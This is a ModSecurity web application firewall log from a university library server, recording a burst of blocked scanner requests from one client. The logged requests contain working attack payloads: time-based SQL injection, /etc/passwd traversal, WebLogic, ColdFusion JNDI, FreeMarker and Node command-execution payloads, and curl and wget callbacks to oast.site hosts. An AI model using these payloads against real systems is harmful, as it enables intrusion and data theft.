[Tue Aug 29 11:31:40.369232 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQSWNIAAAA0"]
[Tue Aug 29 11:31:41.740654 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQNwHgAAAAv"]
[Tue Aug 29 11:31:43.339698 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQJWwUAAAAr"]
[Tue Aug 29 11:31:44.319884 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQEGM0AAAAm"]
[Tue Aug 29 11:31:44.328207 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfh.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPxBXcAAAAS"]
[Tue Aug 29 11:31:44.328360 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPxBXcAAAAS"]
[Tue Aug 29 11:31:44.344510 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPiBksAAAAB"]
[Tue Aug 29 11:31:44.362629 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQFcUEAAAAn"]
[Tue Aug 29 11:31:45.453176 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlg3yn98ofgq4fgw.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAP6NPUAAAAQ"]
[Tue Aug 29 11:31:45.455482 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAANWgU8AAAAG"]
[Tue Aug 29 11:31:46.359497 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAANsAVAAAAAD"]
[Tue Aug 29 11:31:47.444747 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAN@5JMAAAAO"]
[Tue Aug 29 11:31:47.450437 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQJWxEAAAAr"]
[Tue Aug 29 11:31:49.317595 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQV4PsAAAA3"]
[Tue Aug 29 11:31:50.425323 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP6NQIAAAAQ"]
[Tue Aug 29 11:31:50.452344 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQV4QEAAAA3"]
[Tue Aug 29 11:31:50.474810 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgzoer5aysnytgh.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg8eqinkpjgeb5x.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10tsCo-f0AAAP6NQMAAAAQ"]
[Tue Aug 29 11:31:51.340963 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg4eygm4waa5cn8.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgj3bgykqdmts1z.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAP@M3wAAAAZ"]
[Tue Aug 29 11:31:51.366473 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP5mLcAAAAM"]
[Tue Aug 29 11:31:51.453370 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQR48gAAAAz"]
[Tue Aug 29 11:31:52.440398 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAQQynYAAAAy"]
[Tue Aug 29 11:31:53.311127 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAN@5K4AAAAO"]
[Tue Aug 29 11:31:53.388176 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAAN@5LEAAAAO"]
[Tue Aug 29 11:31:54.372977 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10usCo-f0AAAQNwKQAAAAv"]
[Tue Aug 29 11:31:54.404822 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAQOv4YAAAAw"]
[Tue Aug 29 11:31:55.373875 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAN9sRUAAAAJ"]
[Tue Aug 29 11:31:56.317642 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vMCo-f0AAAQnF58AAAAF"]
[Tue Aug 29 11:31:56.392697 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgptt693wxtf5b5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQnF6EAAAAF"]
[Tue Aug 29 11:31:57.445624 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vcCo-f0AAAPDoAYAAAAP"]
[Tue Aug 29 11:31:57.447509 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vcCo-f0AAAPiBoMAAAAB"]
[Tue Aug 29 11:31:58.379548 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAP6NRkAAAAQ"]
